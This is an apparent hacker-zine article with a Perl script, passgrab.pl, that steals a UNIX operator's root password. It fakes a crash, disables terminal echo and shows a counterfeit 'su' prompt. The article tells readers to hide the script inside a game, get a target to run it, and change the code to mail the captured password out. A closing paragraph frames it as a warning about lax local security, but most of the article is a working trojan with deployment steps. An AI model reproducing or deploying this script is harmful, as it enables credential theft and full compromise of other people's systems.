A Password Grabbing Attempt

by Gr@ve_Rose

     First and foremost, I would like to get something out of the way.
My Rogers @Home article in 18:4 was not to tell people how to 
uncap their modems (as so many people e-mailed me about).  It was about
what I believe hacking to be: Learning.  It was something to get you
started on your road of learning and teaching others about computers,
networks, and security.  I hope it helped some people out.  Now, onto the
real article....

     We have all heard about, or even created our own, programs that will 
rootkit a system.  Heck, we're even satisfied if we can get access to a 
webserver and deface someone's site.  The only problem with attacking the 
computer is that computers are strict.  A rule is either true or false and 
if your program doesn't meet the criteria, then you don't get access.
"What else is there besides attacking the computer?" you ask.  Answer:
The operator or the computer.  Social engineering doesn't have to be over
the phone or while you're dressed up like a Bell employee.  Let's examine
this a bit:

     Honestly (for real) how many people out there running UNIX boxes log
in as "root" all the time?  Do you really log in as "user" and "su" when
you need to?  Sure, it's good security practice, but human nature is about 
being lazy and if it save typing two letters and a password, then hey, all
the better.  This is what we're playing upon: The ineptitude, laziness, and
lack of security focus of our target operator.  The basis of the program
is to hide another program that will e-mail you the operator's "root"
password.  You will have to know a little programming (or at least understand
the syntaxes of basic programming) and a fair amount of UNIX technical speak.

     Please keep in mind that this is the first program I have ever
created so you may find an easier way to tweak it.  Feel free.

     First, modify this program to your liking.  Second, create (or get the
source code to) another program, like a game (the type of program doesn't
matter, but something that your target wouldn't normally look at the
source code of).  Third, have them run the program.

     It seems to me (and all my UNIX friends) that we're getting a bit lax
on local security.  I run as "root" all the time on my laptop (and my friends
log in as "root" on their boxes quite often), which is kind of hypocritical
of me.  I wrote this article in the hope that people will realize we, the
hacking community, set the standards for UNIX security, we have to stay on 
top of things and not get lazy.  Local security is the most protected form
of security and if you've lost it, you've lost all your security.

Shout-outs: Cat5, Deathstroke, Harkonen, CrtklMass, c00k, Storm_Dragon.
and, of course, eXoDuS (YNBABWARL!)




#!/usr/bin/perl
#
# by Gr@ve_Rose
# We all know about fancy programs that take over you system
# but what about programs that rely on the ineptitude of 
# the operator? Here is the basic idea:
#
# 1. Start making a program, something small like a game.
# 2. Make it crash. Well, not really, just look like it crashed.
# 3. Pretend that it was a serious crash, serious enough that
#    your 'game' might do bad system things.
# 4. Get them to 'su'.
# 5. One free root password.
#
# Obviously if your 'game' would do something bad, your up-to-date
# wouldn't let it. But, if the person operating it doesn't know that... :)
#
use strict;

# Get the hostname to make it look like a real "system drop" instead
# of just typing [guest@localhost /]$
chop(my $host = `/bin/hostname`);

#
# FALSE PROGRAM GOES HERE
# 

# Turn the echo off so it seems like they're using 'su'
system ("stty -echo");

# Make it look like the program died while making a system call
# (Feel free to make a 'real' excuse)
print "\n";
print "Error: unhandled system exception at line 10.\n";

# Like this will ever happen, but, hey, it's all about how much your
# victim doesn't know! ;)
print "Dropping you to a guest account for safety. Please 'su' back to root\n";

# Make some apologetic reason that your 'program' died
print "Yeah, this program needs to be fixed. Sorry for the inconvenience.\n";
print "\n";

# One 'real' system prompt calling 'su' coming up....
print "[guest@";
print "$host /]\$ su ";
print "\n";
print "password:";

# Come to daddy
my $command = <STDIN>;

# Change the following lines to mail the password to you
# You'll need to add a few things like full hostname and, hopefully,
# an IP address
system ("clear");
print "\n";
print "Your root password is: $command\n";
print "Thankfully this is just a proof-of-concept program.\n";
print "You may want to be more cautious in the future.\n";
print "\n";
print "Gr\@ve_Rose\n";
print "\n";

# Turn echo back on so we can see what we are typing
system ("stty echo");





passgrab.pl